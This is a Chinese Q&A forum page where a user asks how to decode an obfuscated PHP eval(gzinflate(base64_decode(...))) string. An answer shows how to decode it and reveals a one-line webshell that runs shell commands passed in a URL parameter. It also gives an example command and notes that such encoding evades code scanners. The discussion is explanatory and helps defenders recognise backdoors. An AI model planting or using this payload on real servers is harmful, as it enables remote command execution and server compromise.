PHP解密..不懂php,解密eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)))

 我来答
cnyujill
2013-09-18 · 超过17用户采纳过TA的回答
知道答主
回答量:38
采纳率:0%
帮助的人:37.4万
展开全部
你可以编辑一个php文件,输入
<?php echo
gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));
?>
然后运行这个文件 php test.php 就能看到结果了。

这种方式是很弱的加密,但能避开很多代码检测工具。很多wordpress的插件和木马都采用这种模式。

wordpress常footer进行加密,因为里面包含作者的链接和申明,如果去掉这行代码,整个页面就不能正确显示。

木马可以通过这种隐秘的方式传入一段代码让php执行,像上面的例子,结果是 echo `$_REQUEST[a]`;; ?> 所以你在URL里传入 /?a=ls -al; 就会列出当前目录下所有文件。
百度网友690c81e14
2013-09-18 · TA获得超过635个赞
知道小有建树答主
回答量:680
采纳率:0%
帮助的人:668万
展开全部
一般这种文件都有一个最简单的解码方式
编码乱七八糟地字符串你不认识, eval命令同样不认识, 他最终给eval执行的肯定是正经的PHP代码,直接把eval命令中的参数打印出来就行了
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式